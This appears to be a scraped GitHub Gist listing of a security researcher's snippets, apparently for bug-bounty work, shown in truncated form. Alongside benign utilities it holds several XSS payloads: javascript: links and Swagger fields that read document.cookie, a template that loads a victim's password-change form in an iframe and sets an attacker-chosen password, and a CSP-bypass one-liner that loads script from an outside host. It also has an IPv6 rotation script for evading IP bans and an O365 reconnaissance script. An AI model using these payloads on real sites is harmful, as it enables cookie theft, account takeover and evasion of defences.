Skip to content

Instantly share code, notes, and snippets.

View Rhynorater's full-sized avatar

Justin Gardner Rhynorater

762 followers · 17 following
View GitHub Profile
@Rhynorater
Rhynorater / loadCookiesFromEditThisCookie.py
Created September 9, 2021 13:55
import json
import requests
import http.cookiejar
# Load from EditThisCookie export file
def loadCookies(jsonFileName):
x = open(jsonFileName)
d = json.loads(x.read())
cookiejar = http.cookiejar.CookieJar()
for cookie in d:
@Rhynorater
Rhynorater / formatClipboardJSON.py
Created June 11, 2021 14:55
Format JSON Data in the Clipboard
#! /usr/bin/env python3
import pyperclip
import json
contents = pyperclip.paste().replace('[^\\]\\"', '\\\\"')
print(contents)
try:
c = json.loads(contents)
pyperclip.copy(json.dumps(c, indent=4))
except Exception as e:
@Rhynorater
Rhynorater / ipv6rotate.py
Created September 9, 2019 20:03
Quickly rotating IPs to avoid ip ban using /64 ipv6 block.
import requests
from httplib import HTTPConnection
import socket
import subprocess
class MyHTTPConnection(HTTPConnection):
def connect(self):
self.sock = s
if self._tunnel_host:
self._tunnel()
@Rhynorater
Rhynorater / checkms.sh
Created July 1, 2019 18:22
Bash script to check if a certain domain is user O365
#!/bin/bash
# Usage checkms.sh
# domains.txt: file with domains on each line to check
# Output: domains that use O365
# -----
# Usage2 checkms.sh domain.com
# Output: domain if uses 0365, nothing if not
if [ "$#" -eq 1 ]; then
x=$(curl -s -k "https://login.microsoftonline.com/getuserrealm.srf?login=username@$1&xml=1" | egrep "Federated|Managed")
if [[ ! -z $x ]]; then
@Rhynorater
Rhynorater / gist:5c467a23a3fbea5c6b2d1529fa0b0bde
Last active May 25, 2019 02:57
payload
[Click Me](javascript:alert`document.domain`)
@Rhynorater
Rhynorater / gist:3edacd885c61c55dea5b167cba07322d
Last active January 22, 2019 20:48
test
{
"swagger": "2.0",
"info": {
"title": "Swagger Sample App",
"description": "Please to click Terms of service",
"termsOfService": "javascript:alert(document.cookie)"
},
"contact":{
"name": "API Support",
"url": "javascript:alert(document.cookie)",
@Rhynorater
Rhynorater / exploit.php
Created January 17, 2019 15:05
Basic XSS Escalation Template
<?php
header("Content-Type: application/javascript");
?>
frame=document.createElement("iframe")
frame.addEventListener("load", function() {
setTimeout(function(){
//Once the iframe loads, give it 1 second to load the DOM
frame.contentDocument.getElementById("NewPassword").value="1337H4x0rz!!!"
//Set new password
frame.contentDocument.getElementById("ConfirmNewPassword").value="1337H4x0rz!!!"
@Rhynorater
Rhynorater / getValidDNS.sh
Created September 9, 2018 22:32
A little bash script to gather valid AND fast DNS Resolvers from public-dns.info
if [ "$#" -eq 0 ] || [ "$#" -gt 2 ] || [[ $* == *--help* ]] || [[ $* == *-h* ]]; then
echo "Usage ./getValidDNS.sh [output file] [optional: timeout (seconds)]"
exit 1
fi
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active January 3, 2024 07:00
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@Rhynorater
Rhynorater / bookmarklet.js
Created March 27, 2018 01:19
OSCP Video Playback Speed Increase
javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load();